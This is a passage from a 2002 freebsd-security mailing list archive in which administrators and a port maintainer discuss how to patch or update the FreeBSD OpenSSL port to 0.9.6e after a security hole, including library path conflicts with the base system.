SMTP id 4E52943E31 for ; Tue, 30 Jul 2002 09:23:18 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 10100 invoked from network); 30 Jul 2002 16:23:17 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:23:17 -0000 Date: Tue, 30 Jul 2002 18:23:50 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <189113070812.20020730182350@buz.ch> To: Jeff Palmer Cc: Hendrik Scholz , freebsd-security@freebsd.org Subject: Re[2]: audit-packages like program for FreeBSD? In-Reply-To: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org> References: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Jeff Palmer, you wrote. JP> pkg_version -c works for me JP> If all your ports are updated as needed, security issues are fixed as the JP> portstree is updated ;-) I'd recommend checking out sysutils/portupgrade which does a really great job keeping our systems current. Now if we only already had a patched openssl port... Regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:27:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 73CB537B400 for ; Tue, 30 Jul 2002 09:27:10 -0700 (PDT) Received: from mail46.fg.online.no (mail46-s.fg.online.no [148.122.161.46]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB99C43E31 for ; Tue, 30 Jul 2002 09:27:08 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail46.fg.online.no (8.9.3/8.9.3) with SMTP id SAA08528; Tue, 30 Jul 2002 18:26:56 +0200 (MET DST) Message-ID: <000d01c237e5$ceede1d0$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: "Gabriel Ambuehl" Cc: References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> Subject: Re: About the openssl hole Date: Tue, 30 Jul 2002 18:26:05 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I cant do that, but you could easy edit the old port your self and fix = it that way. I cant promise you that this will work, but you could change the = PORTVERSION=3D 0.9.6d, to PORTVERSION=3D 0.9.6e. and change the = distinfo... But then we got the problem with the patches that are included in the = port, that would probaly fail on you.. It's your own choice what to do, if you want to risk it do so. If not, wait for the freebsd team to make an patch for us. If you take a quick look at the current branch you will se that the = openssl is changed to 0.9.6.e, but as we know, current branch aint so = stable. So the best thing is probaly to wait. Best Regards Geir R=E5ness ----- Original Message -----=20 From: "Gabriel Ambuehl" To: "Geir R=E5ness" Cc: Sent: Tuesday, July 30, 2002 6:16 PM Subject: Re: About the openssl hole > You wrote: >=20 > GR> Shuld we start to edit the openssl port (I have emailed the = maninter to update to 96.e, > GR> "or supply the patch from openssl" in the = /usr/ports/security/openssl), or shuld > GR> we wait for an patch from the freebsd team ? >=20 > Do you think you could publish the 0.9.6e port somewhere until it gets > integrated into CVS? >=20 > I think a lot of people could possibly use it... >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:36:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8586E37B400 for ; Tue, 30 Jul 2002 09:36:33 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id E8F9E43E31 for ; Tue, 30 Jul 2002 09:36:31 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch) Received: (qmail 10467 invoked from network); 30 Jul 2002 16:36:30 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:36:30 -0000 Date: Tue, 30 Jul 2002 18:37:01 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: gabriel_ambuehl@buz.ch Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <5113861671.20020730183701@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re[2]: About the openssl hole In-Reply-To: <000d01c237e5$ceede1d0$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hello Geir, Tuesday, July 30, 2002, 6:26:05 PM, you wrote: > I cant do that, but you could easy edit the old port your self and fix it that way. Well I tried to do that... It's just that openssl.org is practically down (you know what I mean...) and thus I was pretty much out of luck > It's your own choice what to do, if you want to risk it do so. I would have risked it (in any case, it's still better to kill SSL services myself trying to defend from the blackhats than having the blackhats destroying everything...) > If not, wait for the freebsd team to make an patch for us. That's more or less what I'm doing now. > If you take a quick look at the current branch you will se that > the openssl is changed to 0.9.6.e, but as we know, current branch aint so stable. I'll have another shot at current once the TrustedBSD stuff is in cause I really want to have ACLs ASAP but running it in production is entirely out of question right now. Best regards, Gabriel -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2i iQEVAwUBPUayoMZa2WpymlDxAQHS2wf9GgUFkA3eI2rSJlKYynsnzisode50bYdW TINnOJW/8mYYUBTiIXDLYZ6Xt+ZZhu+0LzlCQcu9XvgHnxsabDztUYAdGt/XCmde BAUysjmfoRR9FlUEjK9brovds/LKiKODoBSmN2LUSnPDUm0V0ojJbezfQPiRIEmc yHa4cKxWJoMq4gRNRTOCLr2rwVe78rbK1xw3ICe+Z0cDUzJX8VzZijKfzY39aZ9L OPSMdLQ0cJf1ASsJRthNRqzHc299oVdNbRoFia1AR9p1fpaN2u/0qu/9GxQQtYKY T4z17Enao5A8Htf2tJcWZ1/+AXkJ639/gsYUflfV7HgLruEKAwIYoA== =nLA8 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:38:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1A87C37B400 for ; Tue, 30 Jul 2002 09:38:53 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CD9243E3B for ; Tue, 30 Jul 2002 09:38:52 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.1.8] (FLA9Aaa001.chb.mesh.ad.jp [61.193.68.129]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id BAA12875; Wed, 31 Jul 2002 01:38:50 +0900 (JST) Date: Wed, 31 Jul 2002 01:38:48 +0900 From: Shunichi Konno To: freebsd-security@freebsd.org Subject: Re: About the openssl hole In-Reply-To: <170112657687.20020730181657@buz.ch> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> Message-Id: <20020731012456.98C7.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, On Tue, 30 Jul 2002 18:16:57 +0200 Gabriel Ambuehl wrote: GA> Do you think you could publish the 0.9.6e port somewhere until it gets GA> integrated into CVS? I fetched http://www.openssl.org/news/patch_20020730_0_9_6d.txt and renamed it to /usr/ports/security/openssl/files/patch-aa. After that, I did "make install" in /usr/ports/security/openssl. I successfully compiled and installed *patched* openssl-0.9.6d. Is that okay? ---------- KONNO Shunichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 9:57:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1011C37B400 for ; Tue, 30 Jul 2002 09:57:09 -0700 (PDT) Received: from mail45.fg.online.no (mail45-s.fg.online.no [148.122.161.45]) by mx1.FreeBSD.org (Postfix) with ESMTP id DED4C43E5E for ; Tue, 30 Jul 2002 09:57:07 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail45.fg.online.no (8.9.3/8.9.3) with SMTP id SAA19921; Tue, 30 Jul 2002 18:57:03 +0200 (MET DST) Message-ID: <002301c237ea$04b4d4f0$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: Cc: References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> Subject: Re: Re[2]: About the openssl hole Date: Tue, 30 Jul 2002 18:56:12 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I talked with an freind of mine who tried this solution, and he told me = that it where only one patch that failed. If you remove the patch "patch-ah" the build will go fine. But as many know, the port of openssl will not completly replace the = core openssl. (You could see this if you build mod_ssl) So the best thing is to wait for en offical patch. Best Regards Geir R=E5ness ----- Original Message -----=20 From: "Gabriel Ambuehl" To: "Geir R=E5ness" Cc: Sent: Tuesday, July 30, 2002 6:37 PM Subject: Re[2]: About the openssl hole > -----BEGIN PGP SIGNED MESSAGE----- >=20 > Hello Geir, >=20 > Tuesday, July 30, 2002, 6:26:05 PM, you wrote: >=20 > > I cant do that, but you could easy edit the old port your self and > fix it that way. >=20 > Well I tried to do that... It's just that openssl.org is practically > down (you know what I mean...) and thus I was pretty much out of luck >=20 > > It's your own choice what to do, if you want to risk it do so. >=20 > I would have risked it (in any case, it's still better to kill SSL > services myself trying to defend from the blackhats than having the > blackhats destroying everything...) >=20 > > If not, wait for the freebsd team to make an patch for us. >=20 > That's more or less what I'm doing now. >=20 > > If you take a quick look at the current branch you will se that > > the openssl is changed to 0.9.6.e, but as we know, current branch > aint so stable. >=20 > I'll have another shot at current once the TrustedBSD stuff is in > cause I really want to have ACLs ASAP but running it in production is > entirely out of question right now. >=20 >=20 >=20 > Best regards, > Gabriel >=20 > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.0.2i >=20 > iQEVAwUBPUayoMZa2WpymlDxAQHS2wf9GgUFkA3eI2rSJlKYynsnzisode50bYdW > TINnOJW/8mYYUBTiIXDLYZ6Xt+ZZhu+0LzlCQcu9XvgHnxsabDztUYAdGt/XCmde > BAUysjmfoRR9FlUEjK9brovds/LKiKODoBSmN2LUSnPDUm0V0ojJbezfQPiRIEmc > yHa4cKxWJoMq4gRNRTOCLr2rwVe78rbK1xw3ICe+Z0cDUzJX8VzZijKfzY39aZ9L > OPSMdLQ0cJf1ASsJRthNRqzHc299oVdNbRoFia1AR9p1fpaN2u/0qu/9GxQQtYKY > T4z17Enao5A8Htf2tJcWZ1/+AXkJ639/gsYUflfV7HgLruEKAwIYoA=3D=3D > =3DnLA8 > -----END PGP SIGNATURE----- >=20 >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 10: 4:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 212DF37B400 for ; Tue, 30 Jul 2002 10:04:10 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id D49FB43E31 for ; Tue, 30 Jul 2002 10:04:08 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 11331 invoked from network); 30 Jul 2002 17:04:07 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 17:04:07 -0000 Date: Tue, 30 Jul 2002 19:04:34 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: gabriel_ambuehl@buz.ch Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <2115515250.20020730190434@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re[4]: About the openssl hole In-Reply-To: <002301c237ea$04b4d4f0$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hello Geir, Tuesday, July 30, 2002, 6:56:12 PM, you wrote: > I talked with an freind of mine who tried this solution, and he told me that it where only one patch that failed. > If you remove the patch "patch-ah" the build will go fine. > But as many know, the port of openssl will not completly replace the core openssl. > (You could see this if you build mod_ssl) Well I could live without mod_ssl for the next hours, but I can't just go shutdown ssh on all boxes cause that would mean I'd have to go onsite to some 4 NOCs (two of them on the other side of the world) to have SSH get backup. Hmm. Maybe I'll just shut all SSL stuff down and have the NOC monkeys reboot them when the patch is here.... What's happening (I suppose) is that the port gets installed to /usr/local/lib whereas the the old version still is in /usr/lib where it belongs to as part of the base system which means that you probably have to overwrite the old lib by hand but I wouldn't want to guarantee that nothing is going to break if you do this. To make it short: it's probably best to just wait and update your boxes ASAP (I'm just glad I just got a bunch of Athlon XP 1800+ boxes which do make world in no time ;-). Best regards, Gabriel -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2i iQEVAwUBPUa5GcZa2WpymlDxAQFzZwf/RhCHnyKm0feKzFZXJ0/DTD6f5jfQE1cM pUqr7VEcdQ8cRjG8mMJDZ0eYV50DiJZVQmzTLfQwpvurE34YNSP5oxqsAAEwT8sb MRf1l32mEnvLK5AgfWTT5vXlT4hwTftmQJ48vYZMAk2Xt4Grr+7TD4IzfY5S9F1J WBwjTlgBsu+4xE5mG2Ra1AUebdMsIT12tEuIsyQnBjXCEi6miuwbivNrjt4ay//i aiavUsfVGpUSgOi5DxZwiuSsMTr3Zv6ne/6Clcpupmk4MolqUb5l90oLhZXfqlE0 4FZ0eyv5YwdiPEjQ+SOdpqa81rYe8SU2MC9PQ1QHQseeL3VNv1KVcA== =6GuU -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 10:56: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 102E537B400 for ; Tue, 30 Jul 2002 10:55:59 -0700 (PDT) Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 76C3F43E6E for ; Tue, 30 Jul 2002 10:55:58 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id E6CA8243C2 for ; Tue, 30 Jul 2002 12:55:56 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id B446A243C0 for ; Tue, 30 Jul 2002 12:55:54 -0500 (CDT) Message-Id: <5.1.1.6.2.20020730125503.047d8480@localhost> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 30 Jul 2002 12:55:28 -0500 To: freebsd-security@freebsd.org From: Christopher Schulte Subject: Fwd: cvs commit: ports/security/openssl Makefile distinfo ports/security/openssl/files patch-ah Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >dinoex 2002/07/30 10:38:18 PDT > > Modified files: > security/openssl Makefile distinfo > Removed files: > security/openssl/files patch-ah > Log: > Security Update to 0.9.6e > > Revision Changes Path > 1.62 +5 -4 ports/security/openssl/Makefile > 1.22 +1 -1 ports/security/openssl/distinfo > 1.6 +0 -53 ports/security/openssl/files/patch-ah (dead) > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe cvs-all" in the body of the message -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11: 5:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DA38D37B400 for ; Tue, 30 Jul 2002 11:05:33 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 22E8743E31 for ; Tue, 30 Jul 2002 11:05:32 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6UI595H014926 for ; Tue, 30 Jul 2002 20:05:10 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UI57fg014899 for ; Tue, 30 Jul 2002 20:05:07 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: About the openssl hole Date: Tue, 30 Jul 2002 19:52:54 +0200 X-Mailer: Dinoex 1.79 References: <004001c237cf$23c00560$fa00a8c0@elixor> <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020730000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gabriel Ambuehl wrote: > Do you think you could publish the 0.9.6e port somewhere until it gets > integrated into CVS? > > I think a lot of people could possibly use it... sure ... I just committed it, so you can rebuild apache13-modssl with it. to update others ports: see PR: ports/36080 and ports/39054 All other ports can include: .if defined( USE_SSL ) .include "${PORTSDIR}/security/openssl/Makefile.ssl" .endif kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11: 5:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF75637B405 for ; Tue, 30 Jul 2002 11:05:35 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7CAD943E42 for ; Tue, 30 Jul 2002 11:05:34 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6UI5B5H014939 for ; Tue, 30 Jul 2002 20:05:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UI5Ae2014925 for ; Tue, 30 Jul 2002 20:05:10 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: About the openssl hole Date: Tue, 30 Jul 2002 19:52:54 +0200 X-Mailer: Dinoex 1.79 References: <170112657687.20020730181657@buz.ch> <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <20020731012456.98C7.KONNO@hal.rcast.u-tokyo.ac.jp> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020730000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Shunichi Konno wrote: > I fetched http://www.openssl.org/news/patch_20020730_0_9_6d.txt and > renamed it to /usr/ports/security/openssl/files/patch-aa. > After that, I did "make install" in /usr/ports/security/openssl. > I successfully compiled and installed *patched* openssl-0.9.6d. > > Is that okay? Yes this will work fine... But beware of apps that are linked to the lib in base system. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11: 6: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C0F2037B407 for ; Tue, 30 Jul 2002 11:05:37 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6DB5843E31 for ; Tue, 30 Jul 2002 11:05:36 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6UI5D5H014975 for ; Tue, 30 Jul 2002 20:05:13 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UI5C9K014942 for ; Tue, 30 Jul 2002 20:05:12 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Re[2]: About the openssl hole Date: Tue, 30 Jul 2002 19:52:54 +0200 X-Mailer: Dinoex 1.79 References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020730000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Geir RÜness wrote: > But as many know, the port of openssl will > not completly replace the core open ssl. > (You could see this if you build mod_ssl) apache13-modssl will see and use an installed port of openssl in /usr/local kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11:15:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 38FA437B405 for ; Tue, 30 Jul 2002 11:15:51 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 8B22743E3B for ; Tue, 30 Jul 2002 11:15:48 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 13387 invoked from network); 30 Jul 2002 18:15:46 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 18:15:46 -0000 Date: Tue, 30 Jul 2002 20:16:16 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <153119816671.20020730201616@buz.ch> To: dirk.meyer@dinoex.sub.org (Dirk Meyer) Cc: freebsd-security@freebsd.org Subject: Re[4]: About the openssl hole In-Reply-To: References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Dirk Meyer, you wrote. DM> Geir RÜness wrote: >> But as many know, the port of openssl will >> not completly replace the core open ssl. >> (You could see this if you build mod_ssl) DM> apache13-modssl will see and use an installed DM> port of openssl in /usr/local What about OpenSSH? (I mean I could live without mod_ssl for a day...) Regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with 